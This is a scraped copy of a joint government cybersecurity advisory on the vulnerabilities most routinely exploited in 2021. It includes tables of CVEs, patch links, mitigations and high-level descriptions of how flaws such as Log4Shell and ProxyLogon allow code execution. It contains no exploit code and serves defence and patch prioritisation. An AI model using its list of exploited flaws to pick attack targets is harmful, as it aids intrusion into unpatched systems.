before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12 SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b | [Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>) | Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>) CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>) CCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik | UI for ASP.NET AJAX through 2019.3.1023 | [Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>) | ACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Secure | Pulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 | [Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) | CISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>) CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>) ACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>) Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>) CCCS [Alert APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | Fortinet | FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | [Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>) | Joint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>) Joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>) ACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>) CCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) | Cisco | See [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>) | [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>) | CCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft | Office, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) | [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) | CCCS Alert [Microsoft Office Security Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft | Multiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) | [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) | CCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) ### Contact Information **U.S. organizations: **all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov ](<mailto:report@cisa.gov>)or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). **Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. **Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>). **New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654. **United Kingdom organizations:** report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973. ### Revisions April 27, 2022: Initial Version

{"id": "AA22-117A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "2021 Top Routinely Exploited Vulnerabilities", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency ([CISA](<https://www.cisa.gov/>)), National Security Agency ([NSA](<https://www.nsa.gov/Cybersecurity/>)), Federal Bureau of Investigation ([FBI](<https://www.fbi.gov/investigate/cyber>)), Australian Cyber Security Centre ([ACSC](<https://www.cyber.gov.au/>)), Canadian Centre for Cyber Security ([CCCS](<https://www.cyber.gc.ca/en/>)), New Zealand National Cyber Security Centre ([NZ NCSC](<https://www.gcsb.govt.nz/>)), and United Kingdom\u2019s National Cyber Security Centre ([NCSC-UK](<https://www.ncsc.gov.uk/>)). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nU.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. \n\nThe cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.\n\nDownload the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb).\n\n### Technical Details\n\n#### **Key Findings**\n\nGlobally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability\u2019s disclosure, likely facilitating exploitation by a broader range of malicious actors.\n\nTo a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities\u2014some of which were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.\n\n#### **Top 15 Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:\n\n * **CVE-2021-44228.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch.\n * **CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065.** These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., \u201cvulnerability chaining\u201d) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.\n * **CVE-2021-34523, CVE-2021-34473, CVE-2021-31207.** These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft\u2019s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. \n * **CVE-2021-26084.** This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n\nThree of the top 15 routinely exploited vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n\n_Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021_\n\nCVE\n\n| \n\nVulnerability Name\n\n| \n\nVendor and Product\n\n| \n\nType \n \n---|---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nLog4Shell\n\n| \n\nApache Log4j\n\n| \n\nRemote code execution (RCE) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\n| \n\nZoho ManageEngine AD SelfService Plus\n\n| \n\nRCE \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nElevation of privilege \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nSecurity feature bypass \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\n| \n\nAtlassian Confluence Server and Data Center\n\n| \n\nArbitrary code execution \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\n| \n\nVMware vSphere Client\n\n| \n\nRCE \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nZeroLogon\n\n| \n\nMicrosoft Netlogon Remote Protocol (MS-NRPC)\n\n| \n\nElevation of privilege \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nArbitrary file reading \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\n| \n\nFortinet FortiOS and FortiProxy\n\n| \n\nPath traversal \n \n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. \n\nThese vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2021_\n\nCVE\n\n| \n\nVendor and Product\n\n| \n\nType \n \n---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore XP\n\n| \n\nRCE \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock OpenAM server\n\n| \n\nRCE \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion FTA\n\n| \n\nOS command execution \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nAccellion FTA\n\n| \n\nServer-side request forgery \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nAccellion FTA\n\n| \n\nOS command execution \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nAccellion FTA\n\n| \n\nSQL injection \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware vCenter Server\n\n| \n\nRCE \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall Secure Mobile Access (SMA)\n\n| \n\nRCE \n \n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)\n\n| \n\nMicrosoft MSHTML\n\n| \n\nRCE \n \n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)\n\n| \n\nMicrosoft Windows Print Spooler\n\n| \n\nRCE \n \n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)\n\n| \n\nSudo\n\n| \n\nPrivilege escalation \n \n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)\n\n| \n\nCheckbox Survey\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall SSLVPN SMA100\n\n| \n\nImproper SQL command neutralization, allowing for credential access \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nWindows Print Spooler\n\n| \n\nRCE \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP QTS and QuTS hero\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix Application Delivery Controller (ADC) and Gateway\n\n| \n\nArbitrary code execution \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik UI for ASP.NET AJAX\n\n| \n\nCode execution \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco IOS Software and IOS XE Software\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft Office\n\n| \n\nRCE \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft Office\n\n| \n\nRCE \n \n### Mitigations\n\n#### **Vulnerability and Configuration Management**\n\n * Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Use a centralized patch management system.\n * Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was retired in April 2021.\n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources. \n * CISA Insights [Risk Considerations for Managed Service Provider Customers](<https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf>)\n * CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider>)\n\n#### **Identity and Access Management**\n\n * Enforce multifactor authentication (MFA) for all users, without exception.\n * Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. \n * Regularly review, validate, or remove privileged accounts (annually at a minimum).\n * Configure access control under the concept of least privilege principle. \n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges).\n\n**Note:** see [CISA Capacity Enhancement Guide \u2013 Implementing Strong Authentication](<https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf>) and ACSC guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication>) for more information on hardening authentication systems.\n\n#### **Protective Controls and Architecture **\n\n * Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. \n * Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner etc., are reporting the same number of assets.\n * Monitor the environment for potentially unwanted programs.\n * Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.\n * Implement application allowlisting. \n\n### **Resources**\n\n * For the top vulnerabilities exploited in 2020, see joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>)\n * For the top exploited vulnerabilities 2016 through 2019, see joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa20-133a>). \n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n\n### **Disclaimer**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **Purpose **\n\nThis document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **References**\n\n[1] [CISA\u2019s Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\n### **Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities**\n\nCVE\n\n| \n\nVendor\n\n| \n\nAffected Products\n\n| \n\nPatch Information\n\n| \n\nResources \n \n---|---|---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore\n\n| \n\nSitecore XP 7.5.0 - Sitecore XP 7.5.2\n\nSitecore XP 8.0.0 - Sitecore XP 8.2.7\n\n| \n\n[Sitecore Security Bulletin SC2021-003-499266](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates>)\n\n| \n\nACSC Alert [Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems>) \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock \n\n| \n\nAccess Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3\n\nOpenAM 9.x, 10.x, 11.x, 12.x and 13.x\n\n| \n\n[ForgeRock AM Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>)\n\n| \n\nACSC Advisory [Active exploitation of ForgeRock Access Manager / OpenAM servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers>)\n\nCCCS [ForgeRock Security Advisory](<https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory>) \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion \n\n| \n\nFTA 9_12_370 and earlier\n\n| \n\n[Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n| \n\nJoint CSA [Exploitation of Accellion File Transfer Appliance](<https://www.cisa.gov/uscert/ncas/alerts/aa21-055a>)\n\nACSC Alert [Potential Accellion File Transfer Appliance compromise](<https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise>) \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nFTA 9_12_411 and earlier \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nFTA versions 9_12_411 and earlier \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nFTA 9_12_370 and earlier\n\n| \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware \n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>)\n\n| \n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41>) \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\nVMware\n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>)\n\n| \n\nACSC Alert [VMware vCenter Server plugin remote code execution vulnerability](<https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972>)\n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35>)\n\nCCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\nCCCS [SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4>) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\nFor other affected vendors and products, see [CISA's GitHub repository](<https://github.com/cisagov/log4j-affected-db>).\n\n| \n\n[Log4j: Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>)\n\n| \n\nCISA webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\nCCCS [Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability>) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\nZoho ManageEngine \n\n| \n\nADSelfService Plus version 6113 and prior\n\n| \n\n[Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release ](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>)\n\n| \n\nJoint CSA [APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://www.cisa.gov/uscert/ncas/alerts/aa21-259a>)\n\nCCCS [Zoho Security Advisory](<https://www.cyber.gc.ca/en/alerts/zoho-security-advisory>) \n \n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)\n\n| \n\n[Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)\n\n| \n \n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, 